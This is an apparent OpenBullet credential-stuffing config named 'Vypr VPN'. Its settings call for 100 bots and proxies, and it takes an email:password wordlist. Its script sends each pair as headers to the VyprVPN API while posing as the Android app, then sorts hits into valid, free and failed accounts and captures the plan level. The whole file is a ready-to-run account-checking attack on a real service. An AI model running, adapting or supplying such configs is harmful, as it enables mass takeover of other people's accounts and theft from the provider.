[SETTINGS]
{
  "Name": "Vypr VPN",
  "SuggestedBots": 100,
  "LastModified": "2018-05-12T02:39:21.6940992+02:00",
  "AdditionalInfo": "",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://api.goldenfrog.com/settings" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: okhttp/2.3.0" 
  HEADER "Pragma: no-cache" 
  HEADER "password: <PASS>" 
  HEADER "username: <USER>" 
  HEADER "X-GF-Agent: VyprVPN Android v2.19.0.7702. (56aa5dfd)" 
  HEADER "X-GF-PRODUCT: VyprVPN" 
  HEADER "X-GF-PRODUCT-VERSION: 2.19.0.7702" 
  HEADER "X-GF-PLATFORM: Android" 
  HEADER "X-GF-PLATFORM-VERSION: 6.0" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "account_level" 
  KEYCHAIN Failure OR 
    KEY "invalid username or password" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "VyprVPN Free" 
PARSE "<SOURCE>" JSON "account_level_display" Recursive=FALSE -> CAP "Plan" "" "" 
